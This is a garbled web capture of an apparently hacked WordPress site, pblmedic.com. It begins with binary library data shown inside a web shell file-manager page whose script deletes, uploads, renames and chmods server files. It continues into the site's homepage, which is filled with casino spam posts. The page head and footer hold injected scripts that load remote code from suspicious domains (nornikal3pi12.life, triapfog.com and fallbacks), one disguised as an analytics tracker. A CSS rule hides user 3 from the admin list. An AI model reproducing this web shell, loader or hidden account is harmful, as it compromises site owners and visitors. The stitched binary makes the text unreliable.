8D0A(B BBBF   L   4  PC��8   F�E�B �B(�G0�A8�D�i
8D0A(B BBBG   t   �  @E���   F�E�B �B(�A0�A8�G�c�C�Y�D��
8C0A(B BBBG&lt;
8C0A(B BBBH `   �  �L��L   F�E�B �A(�A0��
(D BBBB_
(D BBBGp
(D BBBF   (   `  �M��9    J�D�G SD�A�      �  �M��       (   �  �M��a    K�D�D �|�D�B�L   �  �M���   F�E�B �B(�A0�A8�D��
8D0A(B BBBH   (     hP��j    F�E�K �j
BBA�   H  �P��   F�B�B �B(�A0�D8�G�o�W�E�E�Q�X�P�B�{�E�R�G��
8D0A(B BBBEs�G�X�A�
8J0F(B BBBN   t   �   V��M   F�E�B �B(�A0�D8�D��D�[�B�N
8F0A(B BBBKT
8A0A(B BBBB �   l  �[��S   F�E�B �B(�A0�D8�G�Q
8A0A(B BBBJb�~�M�H�^���K�J�E�I�B�O�C�[�   H   �  �j���   F�B�E �E(�A0�D8�G@�
8D0A(B BBBD                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             �&lt;      `&lt;      @�                    �            @�             �           ��           ��            �            ��           `�            `�             �            ��        	    �           ��            �            @�                                                    0             �A            0�                          8�                   ���o    �             �                    
       g                           @�            �                           �&amp;             �&quot;                   	                             ���o           ���o    (&quot;      ���o           �o    �       ���o                                                                                           @�                     00      @0      P0      `0      p0      �0      �0      �0      �0      �0      �0      �0      �0       1      1       1      01      @1      P1      `1      p1      �1      �1      �1      �1      �1      �1      �1      �1       2      2       2      02      @2      P2      `2      p2      �2      �2      �2      �2      �2      �2      �2      �2       3      3       3      03      @3      P3      `3      p3      �3      �3      �3      �3      �3      �3      �3      �3       4      4       4      04      @4      P4      `4      p4      �4      �4      �4      �4      �4      �4      �4      �4       5      5       5      05      @5      P5      `5      p5      �5      �5      �5      �5      �5      �5      �5      �5       6                                                                                                                                                                                              @=      P=      `=      libjbig2dec.so.0.0.0-0.19-7.el9.x86_64.debug    �XY�7zXZ  �ִF !   t/����] ?�E�h=��ڊ�2N�	�����o6�oň7xj����N�&gt;����y��%�E)}�D�&#039;b0�7y��O� �t6v�3m�ӂ쑑���3Β�3��DJ-(@a7�OX�Nn�U���
P׷�/hs��|�,���T����G&lt;�=�����NmK@��+L��ڣ�?��i�\$��mS�~@�08��]�.�n��6�h�#�u C�h�B区���xf/�@�h�P�:`����S��2�4�=#&amp;�a#��T�,�2����z,�7)��&gt;�u�ܘ�6^��s�
��&gt;�:&amp;�k�M��(ڏ���t�SW���n@�P߸M5�B���w�Gg=���J��8��F`����C���O�9�����d��!�
XB�O��o�l�zl&amp;r�E?7�+&#039;Nƻ8�C�8m��]�n�a�7� �t����@�-QIj�*-m����8�k�^I��D�pNUO��b;���mz8�D�bq���՞#�{�5b�њ�{���6�-��(U�^��o|*O��&lt;��غ�J�*[|���F�S�9]�`ǁ�e���-]j�4����aڧ^��+o_ؿlP0&gt;�q���`���;t=�������^,ޥ���o��1��C,2��p���,(&amp;Y�{6��6&amp;��eG���x�+��y*����L�צ`͚���S՚ù�l�M�8�jp���F�g�����hf$Xm����a����S^�_j���1�/p�E���Ĝ���g}�A$�;�@[��f&gt;5g���/qo�Q�}��1���z}U�c�:��Ws�J�;�&amp;��]�C��_���l��[���ՄM�a��Ȯ���mT����(wg��t|q�3�Hy�~L�Nk���^��|b&lt;�\���re}m�]QD�7o�8����I�ɳ?��(�9Z�h5*�ܙlH_���Z������K�-`�mXABۊ&quot;�h�4�|��V¾�E=����VV�b�ْC��.O�`H���T�;-�.�;�?����W�\���A��C&quot;����&gt;�~����HE�	z���tm�D6jnj�~�3M�5��|��?�6����%����U�e8�B
�$�J��� *�7��ӟZ�t��r^���\�%cu��6�e��[��YIw�Z��S{�,L��0r?&quot;`aq~[��^VH�h�sd�x2+w�ǘC|&#039;��qkۅ1Ѕ��E^7{���3!��~�Xr��J�E��_����q�T�jdK+a�6&gt;���;��O���hWnA;�	N��ei{�`[���4�w�q�����i���$&gt;�$&amp;y &#039;��]����I?����fT�ְ�.u+��n���f�V�S�|������F��e�a�G�чH�l]�q��:v?lGo��P�\���2:�|����3�ڡ
�BG�J[/|_�e���]��%Ф�/�����_H؈�$ׄU,�SϞKFaL���U�z�-3�:O�M�b�K�P��bT�e�ڊ!�dT��p��0�JTX�D v�3W̷�ߵ^�? &#039;��-�ê8�g�;�t�8.�oO���T���5���~W��Q�=x�����Cάv�W:�EF�EZ/t��NY�K�~�(Y�?���`�llI@=S9�-p-W���慗k�&gt;��i���V����!Y7��)�R�3M�?Ҁ�b���,K�&amp;��*x+������m��@���}�Ze�_ř= F��f&lt;���3
�0���TW8dr!5���6J�sG����2�ĎM�0qi}Ӱn��h���W��@�  ����	u ��7  $.¾��g�    YZ .shstrtab .note.gnu.property .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .data.rel.ro .dynamic .got .data .bss .gnu_debuglink .gnu_debugdata                                                                                    �      �                                                  �      �      $                              1   ���o       �      �                                  ;                           �                          C             �      �      g                             K   ���o       �       �       6                           X   ���o       (&quot;      (&quot;      p                            g             �&quot;      �&quot;                                 q      B       �&amp;      �&amp;      �                          {              0       0                                    v              0       0      �                            �             6      6      �                            �             �;      �;      �                            �             �A     �A                                   �              P      P     e                              �             �     �                                  �             (�     (�     @                             �             0�     0�                                  �             8�     8�                                  �             @�     @�                                   �             @�     @�                                 �             @�     @�     �                            �              �      �                                   �             �     �                                   �                      �     4                                                   L�     &lt;                                                   ��                                  </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Flib64" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/lib64';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic &#8211; Página: 2</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//nornikal3pi12.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a88f730cc74c*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://nornikal3pi12.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog paged wp-embed-responsive paged-2 wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/%d0%b4%d0%be%d0%b3%d0%bb%d1%8f%d0%b4-%d0%b7%d0%b0-%d1%88%d0%b5%d1%80%d1%81%d1%82%d1%8e-%d0%bc%d0%b8%d1%81%d0%bb%d0%b8%d0%b2%d1%81%d1%8c%d0%ba%d0%be%d1%97-%d1%81%d0%be%d0%b1%d0%b0%d0%ba%d0%b8-%d0%bf/">Догляд за шерстю мисливської собаки після лісу</a></h2><p>Догляд за шерстю мисливської собаки після лісу є важливим етапом у забезпеченні здоров&#8217;я та добробуту вашого чотирилапого друга. Мисливські собаки, які активно працюють у лісі, https://petguide.in.ua піддаються впливу різноманітних факторів, які можуть негативно вплинути на стан їхньої шерсті. Після кожного виходу на полювання варто звертати особливу увагу на догляд за шерстю, щоб уникнути можливих проблем [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/roulette-with-daily-promotions-usa-fast-an-expert-review/">Roulette with Daily Promotions USA Fast: An Expert Review</a></h2><p>When it comes to online casinos, roulette is a classic game that never goes out of style. With the added excitement of daily promotions, players in the USA can enjoy fast-paced action and great rewards. In this expert review, we will explore the world of roulette with daily promotions at top online casinos, based on [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/trusted-crypto-casino-online-a-comprehensive-review/">Trusted Crypto Casino Online: A Comprehensive Review</a></h2><p>As a seasoned online casino player with 17 years of experience, I have seen the industry evolve and change over the years. One of the most significant developments in recent years has been the rise of trusted crypto casinos online. These innovative online casinos offer players the opportunity to play their favorite casino games using [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/pacanele-gratis-jocuri-aproape-aparate-online/">Păcănele Gratis Jocuri aproape Aparate Online</a></h2><p>Content Cân câștigi la Wild Walker Betano Casino — Gamă uriașă ş jocuri și retrageri foarte rapide Zinx Casino — Reîncărcări săptămânale ce 50 ş rotiri gratuite Vei găsi acest dans acolea să multe alte pacanele geab, totul de un click distanță. B este trebuincios ş te înregistrezi au să depui bani, ci nici nu [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/the-ultimate-guide-to-live-roulette-real-money-play/">The Ultimate Guide to Live Roulette Real Money Play</a></h2><p>Are you a fan of the thrill of live casino games? Do you enjoy the excitement of roulette and the chance to win real mini-roulette.net/ money? If so, then live roulette real money play is the perfect choice for you. In this comprehensive guide, we will explore everything you need to know about playing live</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/bonus-fara-plata-2026-tu-bonusuri-de-cazino-ci-plata/">Bonus fără plată 2026 Tu bonusuri de cazino ci plată</a></h2><p>Content Bonus fara vărsare si rotiri gratuite Joacă Burning Hot când Free Spins Locul 11 – Get’defunct Bet dar vărsare Tu 3 cazinouri care bonus fără achitare azi Întrebări frecvente asupra rotiri gratuite dar vărsare Sunt mai arareor întâlnite acele opțiuni care bonus fără vărsare și ci rulaj. Ş de poți dăinui 100% sigur, este [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/cele-maciuca-bune-bonusuri-fara-magazie-de-cazino-2025-bani-gratuti-rotiri/">Cele măciucă bune Bonusuri Fără Magazie de Cazino 2025 Bani Gratuți &#038; Rotiri</a></h2><p>Content Opta ă tocmac bun bonus fără rulaj Rotiri gratuite prep dotă a unui pacioc de chestiune ajungere Întâiu chestiune în ce îl veți pedepsi ici vor trăi pariurile minime și maxime. Apoi molan limitările în ceea de privește jocurile of pe site-urile ş pariuri sportive opțiunile de pariere în ce trebuie să pariezi. Atunc, [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/tu-cazinouri-rotiri-gratuite-victorybet-bonus-fara-depunere-fara-depunere-in-secera-2026/">Tu Cazinouri Rotiri Gratuite victorybet bonus fără depunere Fara Depunere în secera 2026</a></h2><p>Content Don.ro Casino &#8211; #5 printre top 10 casino România &#8211; victorybet bonus fără depunere Cele apăsător bune cazinouri din Metaverse – Joacă-te deasupra lumi virtuale folosind criptomonede ​7. PariuriPlus Casino Bonusuri Însă Rulaj conj Retrageri Tocmac Rapide Rotiri gratuite în înregistrare TG Casino are licență legală? Aceste site-uri pot fi accesate ajung să spre [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/dwunastu-jackbit-logowanie-do-kasyna-najlepszych-kasyn-z-kodami-bonusowymi-na-darmowe-spiny-polska/">dwunastu Jackbit logowanie do kasyna Najlepszych Kasyn z Kodami Bonusowymi na Darmowe Spiny Polska</a></h2><p>Content Jackbit logowanie do kasyna | Bonus po pompeii miejsca do odwiedzenia gierek ci&#x105;gu rejestracj&#x119; 2025: Wy&#x142;&#x105;cznie najlepsze kasyna online! Wówczas gdy wykorzysta&#x107; bezpłatne spiny oraz spe&#x142;ni&#x107; wymóg ruchu? , którzy sprawi&#x107;, aby dostanie&#x107; bezpłatne spiny z brakiem depozytu? R&#xF3;wnie rzadk&#x105; propozycj&#x105; na rzecz graczy s&#x105; atrakcyjne darmowe spiny wyjąwszy depozytu. Po trzecie, darmowe spiny [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/bezplatna-kasa-zbyt-rejestracje-lucky-block-logowanie-do-kasyna-bez-depozytu-kasyna-pl-2026/">Bezpłatna kasa zbyt rejestrację lucky block logowanie do kasyna bez depozytu Kasyna PL 2026</a></h2><p>Content Wyjątkowe propozycji w celu rodzimych internautów: lucky block logowanie do kasyna Lub istniej&#x105; pi&#x119;&#x107;dziesi&#x119;ciu darmowych spin&#xF3;w zbytnio rejestracj&#x119; w całej grach Abonament naszego własnego biuletynu oznacza, &#x17C;e zapozna&#x142;e&#x15B; si&#x119; i zaakceptowa&#x142;e&#x15B; nasz&#x105; polityk&#x119; prywatno&#x15B;tobie jak i również warunki korzystania z us&#x142;ug. W HolyMolyCasinos wsp&#xF3;&#x142;wkonujemy nasze prace spośród w najwyższym stopniu znakomitymi operatorami kasyn w [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"><a href="https://pblmedic.com/?edit=1&#038;p=%2Fusr%2Flib64&#038;path=%2Fusr%2Flib64%2Flibjbig2dec.so.0" ><span class="meta-nav">&larr;</span> anterior</a></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/3/?edit=1&#038;p=%2Fusr%2Flib64&#038;path=%2Fusr%2Flib64%2Flibjbig2dec.so.0" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
